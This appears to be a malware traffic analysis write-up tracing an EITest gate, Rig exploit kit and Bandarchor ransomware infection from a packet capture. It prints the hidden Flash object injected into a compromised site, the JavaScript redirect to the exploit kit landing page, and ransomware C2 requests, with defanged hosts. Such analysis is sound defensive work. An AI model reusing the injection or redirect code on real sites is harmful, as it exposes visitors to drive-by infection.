ElTest -> Rig Exploit Kit -> Bandarchor Ransomware Traffic Analysis

Source: malware-traffic-analysis.net

​The infection method is as follows:

• www[.]tdca[.]ca - Compromised site
• mapobifi[.]xyz - 85.93.0.110 port 80 – EITest gate
•  ew[.]203kcontractorsarkansas[.]com - 109.234.36.220 port 80 -  Rig EK
• 109.236.87.204 - GET /default.jpg - Post-infection traffic caused by the Bandarchor ransomware
• 109.236.87.204 - POST /yyy/fers.php - Post-infection traffic caused by the Bandarchor ransomware

*Analyze PCAP using filter “http.request”

Relevant Additional Analysis:

1. Get / HTTP/1.1 request to 207.182.128.162 (length: 523 bytes)
2. Get HTTP request to 85.93.0.110 x2 (length: 414 & 426 bytes, respectively)
3. Get HTTP request to 109.234.36.220 x4 (length: 523, 748, 698, & 504 bytes)​ 
4. GET HTTP request to 109.236.36.204 x3 (length: 207, 229, & 229 bytes)

1. Following TCP stream of the get request to 207.182.128.162 (length: 523 bytes) reveals Flash movie value and the embedded source with “allowScriptAccess” as hxxp://mapobifi.xyz/qdxtqktb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile from the website hxxp://www.tdca[.]ca.

The full injected source code to the compromised website is as follows:
 
 <body> <div style = "position: absolute;z-index:-1; left:282px; opacity:0;filter:alpha(opacity=0); -moz-opacity:0;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="trxoq" codebase="hxxp://fpdownload[.]macromedia[.]com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="50" height="46" align="middle" >
<param name="allowScriptAccess" value="always"/><param name="movie" value="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/"/><param name="quality" value="high"/><param name="bgcolor" value="#ffffff"/><param name="wmode" value="opaque"/>
<embed src="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/" quality="high" bgcolor="#ffffff"  name="trxoq" width="43" height="38" align="middle" allowScriptAccess="always" play="true" type="application/x-shockwave-flash" pluginspage="hxxp://www[.]macromedia[.]com/go/getflashplayer" wmode="opaque"/></object>
</div> </body> 
</body>

1. GET mapobifi[.]xyz/qdxtqktkb3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile for the shockwave file with the header “CWS.” (referrer: hxxp://tdca.ca)

GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
 
 
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
 
 
3. Using JavaScript, redirects the user to 'hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE’ using JavaScript (size? Type?) 
The full source code is as follows:
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow">
<meta http-equiv="refresh" content="0; url='hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE'">
</head>
<body>
FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB
<script type="text/javascript">
document.location.href = "hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE";
</script>
geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ
</body>
</html>
 
4. GET hxxp://ew[.]203kcontractorsarkansas[.]com/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU [

5. Same request but to GET index[.]php?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU

6. GET to /default.jpg and POST to /yyy/fers[.]php 109.236.87.204 

The full script as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: "7-5332e92dca840"
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
 
defaultPOST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache